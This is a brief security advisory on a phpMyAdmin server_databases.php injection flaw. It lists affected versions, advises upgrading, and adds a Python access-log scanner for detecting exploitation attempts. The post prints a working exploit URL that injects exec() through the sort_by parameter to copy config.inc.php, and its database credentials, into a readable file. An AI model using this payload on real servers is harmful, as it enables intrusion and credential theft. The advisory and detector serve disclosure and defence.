phpMyAdmin's server_databases.php bug
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by=”])
OR exec(‘cp $(pwd)”/config.inc.php” config.txt’); //&sort_order=desc&token=[valid token]
Someone may attack you with this method.
The following phpMyAdmin versions are affected:
phpMyAdmin 2.11.9
phpMyAdmin 2.11.8
phpMyAdmin 2.11.7
phpMyAdmin 2.11.5.1
phpMyAdmin 2.11.5
phpMyAdmin 2.11.4
phpMyAdmin 2.11.1
phpMyAdmin 2.9.1
phpMyAdmin 2.9.2-rc1
phpMyAdmin 2.9.1.1
phpMyAdmin 2.11.8.1
phpMyAdmin 2.11.5.2
phpMyAdmin 2.11.2.2
phpMyAdmin 2.11.2.1
phpMyAdmin 2.11.1.2
phpMyAdmin 2.11.1.1
phpMyAdmin 2.10.0.2
phpMyAdmin 2.10.0.1
To deal with this, update your phpMyAdmin to a version
above 2.11.9.
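
To check whether a server has already received requests like the one above, the following Python script (an added example, not part of the original post and not phpMyAdmin code) scans access log lines for server_databases.php requests whose sort_by value is not a plain identifier. The log format, the identifier allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate sort_by value is a plain column identifier.
SAFE_SORT_BY = re.compile(r"[A-Za-z0-9_]+")
# Request line inside a common/combined format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IPs, placeholder token and payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /server_databases.php'
    '?pos=0&dbstats=0&sort_by=SCHEMA_NAME&sort_order=desc&token=TOKEN HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2009:10:05:00 +0000] "GET /server_databases.php'
    '?pos=0&dbstats=0&sort_by=%22%5D)%20OR%20exec(%27PLACEHOLDER%27);%20//'
    '&sort_order=desc&token=TOKEN HTTP/1.1" 200 5120',
    # Same odd value on a different script: out of scope for this check.
    '192.0.2.10 - - [01/Jan/2009:10:06:00 +0000] "GET /index.php?sort_by=%22%5D) HTTP/1.1" 200 900',
]


def suspicious_requests(lines):
    """Return (client_ip, decoded sort_by) for flagged server_databases.php requests."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group(1))
        if not url.path.endswith("/server_databases.php"):
            continue
        # parse_qs URL-decodes the values, so encoded quotes and brackets are visible.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("sort_by", []):
            if not SAFE_SORT_BY.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sort_by={value!r}")
```

Parameters sent in a POST body do not appear in the access log, so this only covers requests that carry sort_by in the URL.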